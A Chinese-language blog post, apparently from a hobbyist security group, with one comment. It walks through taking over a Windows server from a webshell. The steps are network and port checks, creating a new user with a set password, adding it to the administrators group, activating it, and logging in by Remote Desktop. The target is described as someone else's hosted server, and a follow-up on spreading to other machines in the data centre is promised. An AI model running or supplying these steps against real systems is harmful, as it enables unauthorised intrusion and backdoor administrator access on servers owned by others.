提权服务器登录

作者:老猫 分类: 信息安全 发布于:2018-2-21 21:24 ė897次浏览 62条评论

大家好我是戒灵

今天的主题是webshell提权服务器,这是后面教徒弟的课程,大概给你们简讲一下吧。因为今天想不到什么可讲的,,,最近一直参加篮球比赛,所以,最近应该没什么时间更新了,毕竟还要上学什么的,反正我一有空就更新吧,意思意思就行了!

首先我们登录我们的webshell

打开目录webshell,执行一下cmd的命令行的一个命令。

介绍一下,这个命令行也就是相当我们电脑的cmd吧,只是把他变为了网页的形式而已,没多大区别!


首先:查询本地连接,命令为:ipconfig

然后查看一下他的站点是什么服务器,我看了一下,是电信,河北的。

注:如果你在查询的时候出现了什么错误,你可以看一下执行函数,试另一个看看,基本的话,应该都是可以的!

第一步,看一下他的端口吧

命令:netstat -an

首先为什么看端口呢,因为看看他有没有打开,方不方便远程连接

我看了,3389默认的都是开启了,这里的话,我们就可以远程登录进行一个房屋试试看


第二步:看看他机器上的用户有那一些

命令:net user

看了是administrator,只有一个

然后我们创建一个我们后面一会要登录的用户

命令:net user 用户名 密码 /add

我输入的是net user jl 2189190137 /add

但这不是管理员吧,那就加入管理员去

命令:net localgroup administrator jl /add

执行完成

接下来就去激活账户了

命令:net user jl /active:yes

完成

去尝试登录一下,打开电脑的远程连接桌面,就在开始哪一边,左下角。。。----------------------所有程序--附件--远程桌面连接

先去看看ip是多少

打开cmd

输入ping www.xxxxxx.com

OK,ip知道了

远程试试

写上用户和密码

点击确定

ok,登录进去了,说明提权成功

接下来的操作就是可以去进行一些渗透到它机房里边其他机器的操作等等

这渗透机房这个后面我会更新在本博客的。不再多讲了

不要做坏事!

谢谢!

ok,教程结束吧

                    

                                         本文章有惩戒安全组提供

    戒灵拱写,未尽允许禁止抄袭,转载请写上本博客

                                                                                 不懂联系QQ:2189190137       戒灵

                                                                        惩戒安全组官方群群号:200278129

本文出自 MA2安全网,转载时请注明出处及相应链接。

评论

  1. 顾轩 2018-02-22 07:16 回复

    毫无技术可言

    1. MA2安全团队 2018-02-24 10:50 回复

      @顾轩:我们争取做得更好,感谢支持。

发表评论

电子邮件地址不会被公开。必填项已用*标注


Ɣ回顶部